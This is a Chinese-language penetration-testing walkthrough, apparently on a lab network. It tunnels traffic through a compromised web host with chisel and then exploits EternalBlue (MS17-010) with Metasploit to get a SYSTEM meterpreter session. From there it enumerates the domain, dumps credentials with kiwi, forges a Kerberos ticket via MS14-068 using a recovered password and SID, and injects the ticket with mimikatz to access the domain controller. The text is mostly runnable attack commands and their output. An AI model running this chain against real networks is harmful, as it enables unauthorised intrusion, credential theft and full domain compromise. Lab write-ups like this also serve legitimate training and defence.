chisel+msf攻入内网
在kali上下载chisel再上传到Ubuntu上
目标服务器开启服务端
./chisel_1.7.6_linux_amd64 server -p 2333 --socks5
攻击机kali开启客户端
./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks
攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。
永恒之蓝横向渗透攻击
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.183.0/24
set threads 50
先扫描ip哪些存在此漏洞,发现192.168.183.1,192.168.183.128两个ip存在
对192.168.183.128进行攻击
set Proxies socks5:127.0.0.1:1080
#msf全局把代理指向127.0.0.1:1080(攻击机1080端口进行socks5监听)
use exploit/windows/smb/ms17_010_eternalblue #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp #因为使用代理所以正向监听
set AutoRunScript post/windows/manage/migrate #自动化后渗透测试,执行
# 一次就可以获得对目标的控制权限
set rhost 192.168.183.128 #设置内网域成员为目标机
set lport 4444 #设置监听端口
run
攻击成功,直接为最高权限
进行简单内网收集
进入shell执行命令
shell #进入windows 命令行shell
net view # 查看局域网内其他主机名
net view /domain # 查看有几个域
net view /domain:DEMO #查看域中主机
域DEMO中有TESTWIN7-PC 和WIN-ENS2VR5TR3N两台主机。
net localgroup administrators #查看本地管理员组
net group "domain controllers" /domain #查看域控主机的名字
这种情况是必须域用户才能访问,非域用户没有权限执行域命令。我们需要降低权限到普通域用户,或者说模拟假冒普通域用户如/demodouser令牌。
再看whoami,已经降为域用户demo/douser
域控主机即domain controller 为WIN-ENS2VR5TR3N
wmic computersystem get domain #完整域名
完整域名 demo.com
查看域控IP为192.168.183.130
查看域中的用户
存在3个域用户:
Administrator 、douser、 krbtrt
查看用户demo\douser的sid为
S-1-5-21-979886063-1111900045-1414766810-1107
再用systeminfo命令,查看信息
补丁信息
[01]: KB2491683
[02]: KB2534111
[03]: KB2564958
[04]: KB2621440
[05]: KB2653956
[06]: KB2654428
[07]: KB2698365
[08]: KB2705219
[09]: KB2736422
[10]: KB2813430
[11]: KB2900986
[12]: KB2937610
[13]: KB2943357
[14]: KB2978120
[15]: KB2984972
[16]: KB2992611
[17]: KB2999226
[18]: KB3004375
[19]: KB3010788
[20]: KB3023215
[21]: KB3031432
[22]: KB3035126
[23]: KB3037574
[24]: KB3045685
[25]: KB3046269
[26]: KB3072305
[27]: KB3074543
[28]: KB3086255
[29]: KB3097989
[30]: KB3101722
[31]: KB3108371
[32]: KB3122648
[33]: KB3127220
[34]: KB3155178
[35]: KB4019990
[36]: KB4040980
[37]: KB976902
渗透内网就要想到著名的域权限提升漏洞MS14-68,危害很大,可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。该靶机内网域有没有这个漏洞呢?通过对照相应漏洞补丁号:KB3011780,发现该域网没有装相应补丁,即可能存在MS14-68漏洞。下面我们利用此漏洞进攻域控。
信息搜集到此后,回到meterpreter执行rev2self恢复最高权限。
回到meterpreter,用rev2sel命令重新具有系统最高权限。
先使用msf中的kiwi模块
creds_all #列举所有凭据
明文密码出现
查看桌面发现还有MS14-068.exe ,利用此漏洞提权
MS14-068.exe 利用方法
构造payload如下:
MS14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
成功生成票据文件“TGT_douser@demo.com.ccache”!
使用mimikatz
mimikatz.exe #启动Mimikatz
privilege::debug #取得特权
kerberos::purge #清空当前主机中所有凭证,否则会影响凭证伪造
kerberos::list #查看当前机器凭证
kerberos::ptc <生成的票据文件> #将票据注入到内存中
票据注入内存
查看是否攻入域控
net use \\WIN-ENS2VR5TR3N
dir \\WIN-ENS2VR5TR3N\c$
dir \\WIN-ENS2VR5TR3N\c$
于是我们可以看到域控主机的文件,换句话说,我们已经拥有了域管理员权限。
后续:本来要继续生成黄金票据或白银票据维持权限,得到dc的明文密码,但是kali攻击机一直连不上,过后再更QAQ。